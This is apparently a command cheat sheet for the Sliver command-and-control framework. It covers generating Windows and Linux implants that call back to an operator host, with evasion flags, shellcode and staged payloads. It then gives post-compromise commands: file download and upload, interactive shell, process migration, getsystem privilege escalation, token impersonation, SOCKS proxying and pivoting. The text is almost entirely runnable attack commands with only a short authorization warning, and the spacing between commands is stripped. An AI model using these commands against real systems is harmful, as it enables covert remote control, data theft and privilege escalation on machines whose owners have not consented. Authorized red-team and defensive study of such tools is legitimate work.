Sliver is a modern, open-source cross-platform adversary emulation/red team framework designed as an alternative to Cobalt Strike. It provides advanced command and control capabilities with support for multiple platforms, evasive communications, and team-based operations.
⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using in any environment.
# Start the server (first run will generate certificates)./sliver-server
# Start server with custom configuration./sliver-server-c/path/to/config.json
# Start server in daemon mode./sliver-serverdaemon
# Connect to local server./sliver-client
# Connect to remote server./sliver-client-c/path/to/client.cfg
# Generate new client configuration./sliver-serveroperator--nameusername--lhostserver-ip
# Generate with custom name and save locationgenerate--mtls192.168.1.100:8888--oswindows--save/tmp/implant.exe--nameMyImplant
# Generate with evasion featuresgenerate--mtls192.168.1.100:8888--oswindows--evasion--skip-symbols
# Generate shellcodegenerate--mtls192.168.1.100:8888--oswindows--formatshellcode
# Generate shared librarygenerate--mtls192.168.1.100:8888--oslinux--formatshared
# Get system informationinfo
# Get current userwhoami
# Get current working directorypwd# List files and directoriesls
# Change directorycd/path/to/directory
# Download filedownload/remote/path/file.txt
# Upload fileupload/local/path/file.txt/remote/path/
# List processesps
# Get current process infogetpid
# Migrate to another processmigrate<pid>
# Execute commandexecute<command>
# Start interactive shellshell
# Terminate processterminate<pid>
# Get network interfacesifconfig
# Get network connectionsnetstat
# Port forwardportfwdadd--bind127.0.0.1:8080--remote192.168.1.10:80
# List port forwardsportfwd
# Remove port forwardportfwdrm--id<id>
# SOCKS proxysocks5start
# Stop SOCKS proxysocks5stop
# Get current privilegesgetprivs
# Attempt privilege escalationgetsystem
# Run as different userrunas-uusername-ppassword<command>
# Impersonate tokenimpersonate<token-id>
# Revert to selfrev2self
# Generate pivot listenerpivotstcp--bind0.0.0.0:9999
# Connect through pivotgenerate--mtlspivot-host:9999--oswindows
# List active pivotspivots
# Stop pivotpivots--id<id>stop
# Create new implant profileprofilesnewwindows-profile--mtls192.168.1.100:8888--oswindows--archamd64
# Generate from profilegenerate--profilewindows-profile
# List profilesprofiles
# Delete profileprofilesrmwindows-profile
# Update armoryarmoryupdate
# Install extensionarmoryinstall<extension-name>
# List available extensionsarmory
# List installed extensionsarmoryinstalled
# Use evasion optionsgenerate--mtls192.168.1.100:8888--oswindows--evasion--skip-symbols--debug
# Try different communication protocolsgenerate--dnsexample.com--oswindows
# Use staged payloadsgeneratestager--mtls192.168.1.100:8888--oswindows
This cheat sheet provides a comprehensive reference for using Sliver C2 Framework. Always ensure you have proper authorization before using this tool in any environment.